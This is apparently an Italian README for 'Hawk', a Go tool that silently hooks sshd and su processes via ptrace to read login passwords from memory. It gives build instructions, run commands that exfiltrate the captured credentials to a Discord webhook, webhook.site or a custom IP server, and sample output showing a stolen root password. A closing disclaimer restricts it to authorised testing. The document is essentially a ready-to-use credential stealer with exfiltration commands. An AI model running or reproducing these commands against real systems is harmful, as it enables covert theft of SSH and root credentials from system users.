
Strumento Golang progettato per esfiltrare password trovate tramite i servizi sshd e su
Intercetta silenziosamente le credenziali SSH e SU in tempo reale
Hawk monitora i processi sshd e su, estraendo le password dalla memoria tramite ptrace senza modificare i processi target. Zero scritture. Pura raccolta di credenziali in sola lettura.

Hawk sfrutta il filesystem /proc di Linux per individuare i processi SSH e SU, quindi usa ptrace per agganciarsi e intercettare le syscall. Quando avviene l'autenticazione tramite password, legge la password direttamente dalla memoria del processo durante la syscall write(), in modo completamente trasparente per il processo target. Le credenziali vengono esfiltrate tramite webhook o stampate su stdout.
Approfondimento: Articolo del Blog
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk
Hawk rileva automaticamente i webhook di Discord e invia messaggi formattati:
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN
Configurazione: crea un webhook nel tuo server Discord seguendo la guida ai webhook di Discord. Le credenziali appariranno nel tuo canale formattate con hostname, nome utente e password.
Per altri servizi webhook (webhook.site, server personalizzati, ecc.):
# HTTPS (rilevato automaticamente)
./hawk https://webhook.site/your-unique-id
# HTTP
./hawk http://192.168.1.100:6969/webhook
# HTTPS automatico se non viene specificato alcun protocollo
./hawk webhook.example.com/path
Niente webhook? Le credenziali vengono stampate su stdout:
./hawk
Output:
hostname=server01 username=root password=SuperSecret123
/proc montatoQuesto strumento è destinato esclusivamente a test di sicurezza autorizzati e a fini educativi. L'accesso non autorizzato a sistemi informatici è illegale. Usalo con responsabilità e solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione ai test.